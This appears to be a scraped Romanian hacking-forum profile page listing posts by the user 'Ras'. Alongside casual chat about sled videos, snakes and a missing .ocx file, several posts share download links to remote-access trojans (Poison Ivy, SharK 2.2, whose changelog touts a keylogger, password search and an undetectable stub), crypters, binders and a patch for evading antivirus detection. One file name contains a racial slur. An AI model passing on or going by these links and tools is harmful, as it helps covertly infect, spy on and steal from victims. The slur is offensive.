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Everything posted by Ras

  1. Poison Ivy 2.2.0 Scan: Download: http://rapidshare.com/files/44715979/Hell_Packer_2.0.rar Password: rst
  2. n-ai pentru ce!
  3. Am gresit cand am facut arhiva... si nu mai stiu care e parola la patch Am uploadat patch-ul fara parola... Scuze... Download: http://www.mediafire.com/?exetm1wb3od
  4. Ras

    Nos in actiune

    frumos zbeng :wink:
  5. http://rstcenter.com/forum/viewtopic.php?t=6222 este deja postat de mine
  6. Ras

    Film groaznic

    chiar acum cateva zile am dat niste mesaje cu acel link nu stiu cum poate sa arate asa... un amic mi-a zis ca boala se cheama Harlequin type ichthyosis si ca ii cresc solzi de sarpe ... bleahh nici nu vreau sa ma gandesc sau sa vad asa ceva in fata ochilor... EDIT http://www.youtube.com/watch?v=T50XJWLwVZE&NR=1 uitati-va cum ii da lapte si cum se uita copii aia... :shock:
  7. Ras

    Nos in actiune

    cred ca esti idolul lor la tara aclolo :lol: zbeng asteptam filmulet si de la tine )))
  8. iti trebuie acel .ocx comdlg32.ocx... cauta pe google dai download si pune .ocx-ul langa program EDIT uite intrii aici http://www.ascentive.com/support/new/support_dll.phtml?dllname=COMDLG32.OCX si downloadezi http://www.ascentive.com/support/new/libraryfiles.exe ... si o sa iti puna toate .ocx-urile si .dll-urile
  9. zbeng m-a ginit.
  10. Folositi acel patch pentru a face programul sa fie nedetectabil Download: http://rapidshare.com/files/43887560/Undetector_1.2__Private_Version____UD_Patch.rar
  11. Download: http://rapidshare.com/files/43886616/ExeShield_Cryptor_v1.3RC.rar
  12. Download: http://rapidshare.com/files/42645683/Selassi_Binder.rar
  13. Download: http://rapidshare.com/files/43703426/trendy_nigger_binder_1.0b.rar
  14. Asteptam cu nerabdare sa revina rst
  15. Ras

    SharK 2.2

    [+] You can see the Awaystatus in the Additional-Info Coloumn [+] some code-optimations [+] New About Diaolog [+] User-Plugins [+] Search Passwords [+] Global Password List [+] Comboboxes should lost Focus in FileMgr and RegEdit after selecting [+] Popup When Rar'in + before Downloading the Archive [+] Colored HTML-Offlog [+] External Window for Keylogger [+] Drag&Drop Files in FileMgr for easy Uploading [+] Offlog should replace {enter} and {space} automaticially [+] (Setting) Stop Highlighting Only When Clicking on Server [*] if you cancel the upload of a pass-plugin, the client unlocks the textbox [*] Improved Server-Removing [*] SIN Console saves last Additional_Info on Groupchange, Refresh etc [*] New Transfer-System! MUCH more faster & stable!! [*] Client crashed when HOSTS-File is empty (Host Redirect) [*] Offlog is going to be cleared when removing server [*] Icon Changer Removed; so now you can use better Icons with Resc. hacker and you can make your stub fud Homepage: http://shark-project.net/ Download: http://rapidshare.com/files/41348612/sharK_2.2.rar
  16. Ras

    RST CompPE

    Interesant... Downloadez acum Am sa revin cu un edit... ca sa-mi spun parerea despre program.
  17. Partea a II-a: Primele 2 minute mergem lejer ca sa ne tragem sufletu' apoi trecem strada si o luam fix printr-un restaurant... pacat ca nu a venit dupa noi sa ne filmeze calumea cand eram in dreptul terasei de la restaurant.
  18. Din pacate nu stam in Constanta... Si noi iesim de 4 ani si asa am facut in fiecare an...
  19. cand i-ai vazut pe primii si unde? poate eram tot noi
  20. prietena unui amic.
  21. Astazi (05-07-2007) eu si cu tovarasii mei am iesit imbracati in geci, manusi, fulare si caciuli inarmati cu o sanie. Partea I: Partea a II-a: Am sa revin cu mai multe filmulete si poate cateva poze... Sper ca ati ras si voi asa putin.
  22. Download: http://rapidshare.com/files/41069730/-unkOwn_Crypter_1.0.rar
  23. Download: http://rapidshare.com/files/41069387/-USC_Private.rar
  24. Ras

    Vanatoare de serpi

    stai calm ca am avut sarpe... aveam si o sticla de 0,5 L plina cu soparle...
  25. Ras

    Vanatoare de serpi

    crede-ma nos... nu vreau sa te jignesc... nu am nimic cu tine. Ai o minte de copil... nu vad rost-ul acestui topic "Vanatoare de serpi" mie cel putin mi se pare o prostie... Scuze dar nu m-am putut abtine.
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